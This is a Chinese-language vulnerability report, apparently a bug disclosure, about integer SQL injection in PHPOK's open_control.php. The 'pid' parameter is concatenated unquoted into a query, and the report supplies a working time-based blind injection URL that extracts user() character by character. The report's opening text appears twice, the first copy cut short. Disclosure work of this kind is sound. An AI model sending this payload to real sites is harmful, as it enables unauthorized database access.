### 简要描述: RT ### 详细说明: 在framework/www/open_control.php中: ``` //网址列表,这里读的是项目的网址列表 function url_f() { $id = $this->get("id"); if(!$id) $id = "content"; $this->assign("id",$id); $pid = $this->get("pid"); if($pid) { $p_rs = $this->model('project')->get_one($pid); $type = $this->get("type"); if(!$p_rs) { error_open("项目不存在"); } if($type == "cate" && $p_rs["cate"]) { $catelist = $this->model("cate")->get_all($p_rs['site_id'],$p_rs['cate']); $this->assign("rslist",$catelist); $this->assign("p_rs",$p_rs); $this->view("open_url_cate"); } else { $pageid = $this->get($this->config["pageid"],"int"); $psize = $this->config["psize"]; if(!$psize) $psize = 20; if(!$pageid) $pageid = 1; $offset = ($pageid - 1) * $psize; $pageurl = $this->url("open","url","pid=".$pid."&type=list&id=".$id); $condition = "l.site_id='".$p_rs["site_id"]."' AND l.project_id='".$pid."' AND l.parent_id='0' "; $keywords = $this->get("keywords"); if($keywords) { $condition .= " AND l.title LIKE '%".$keywords."%' "; $pageurl...
### 简要描述: RT ### 详细说明: 在framework/www/open_control.php中: ``` //网址列表,这里读的是项目的网址列表 function url_f() { $id = $this->get("id"); if(!$id) $id = "content"; $this->assign("id",$id); $pid = $this->get("pid"); if($pid) { $p_rs = $this->model('project')->get_one($pid); $type = $this->get("type"); if(!$p_rs) { error_open("项目不存在"); } if($type == "cate" && $p_rs["cate"]) { $catelist = $this->model("cate")->get_all($p_rs['site_id'],$p_rs['cate']); $this->assign("rslist",$catelist); $this->assign("p_rs",$p_rs); $this->view("open_url_cate"); } else { $pageid = $this->get($this->config["pageid"],"int"); $psize = $this->config["psize"]; if(!$psize) $psize = 20; if(!$pageid) $pageid = 1; $offset = ($pageid - 1) * $psize; $pageurl = $this->url("open","url","pid=".$pid."&type=list&id=".$id); $condition = "l.site_id='".$p_rs["site_id"]."' AND l.project_id='".$pid."' AND l.parent_id='0' "; $keywords = $this->get("keywords"); if($keywords) { $condition .= " AND l.title LIKE '%".$keywords."%' "; $pageurl .= "&keywords=".rawurlencode($keywords); $this->assign("keywords",$keywords); } $rslist = $this->model('list')->get_list($p_rs["module"],$condition,$offset,$psize,$p_rs["orderby"]); if($rslist) { $sub_idlist = array_keys($rslist); $sub_idstring = implode(",",$sub_idlist); $con_sub = "l.site_id='".$p_rs["site_id"]."' AND l.project_id='".$pid."' AND l.parent_id IN(".$sub_idstring.") "; $sublist = $this->model('list')->get_list($p_rs["module"],$con_sub,0,0,$p_rs["orderby"]); if($sublist) { foreach($sublist AS $key=>$value) { $rslist[$value["parent_id"]]["sonlist"][$value["id"]] = $value; } } } //读子主题 $total = $this->model('list')->get_total($p_rs["module"],$condition); $pagelist = phpok_page($pageurl,$total,$pageid,$psize,"home=首页&prev=上一页&next=下一页&last=尾页&half=5&opt=第(num)页&add=(total)/(psize)&always=1"); $this->assign("pagelist",$pagelist); $this->assign("p_rs",$p_rs); $this->assign("rslist",$rslist); $this->view("open_url_list"); } } else { $condition = " p.status='1' "; $rslist = $this->model('project')->get_all_project($_SESSION["admin_site_id"],$condition); $this->assign("rslist",$rslist); } $this->assign("id",$id); $this->view("open_url"); } ``` $pid = $this->get("pid"); 获取参数pid的值,然后调用下面的方法 $p_rs = $this->model('project')->get_one($pid); ``` //取得项目信息 function get_one($id,$ext=true) { if(!$id) return false; $sql = "SELECT * FROM ".$this->db->prefix."project WHERE id=".$id; $rs = $this->db->get_one($sql); if(!$rs) return false; if($ext) { $ext_rs = $GLOBALS['app']->model("ext")->get_all("project-".$id); if($ext_rs) $rs = array_merge($ext_rs,$rs); } return $rs; } ``` 这里发现$id 虽然做了全局的过滤,但是sql语句中并没有两侧加上引号,这样过滤就没啥意义了,直接可以sql整形注入。 PS: 这里还有一个奇怪的问题,访问页面后发现一只提示模板不存在,后来发现在tpl文件夹下根本就不存在这个open_control.php中所需要的模板。导致sql注入无法回显。不知道是否是开发者忘记了还是这个模块已经取消了。 poc: /index.php?c=open&f=url&pid=0%20or%20if%28ord%28substr%28user%28%29%2C1%2C1%29%29%3D1%2Csleep%28%200.5%29%2C1%29%3D0 ### 漏洞证明: poc: /index.php?c=open&f=url&pid=0%20or%20if%28ord%28substr%28user%28%29%2C1%2C1%29%29%3D1%2Csleep%28%200.5%29%2C1%29%3D0
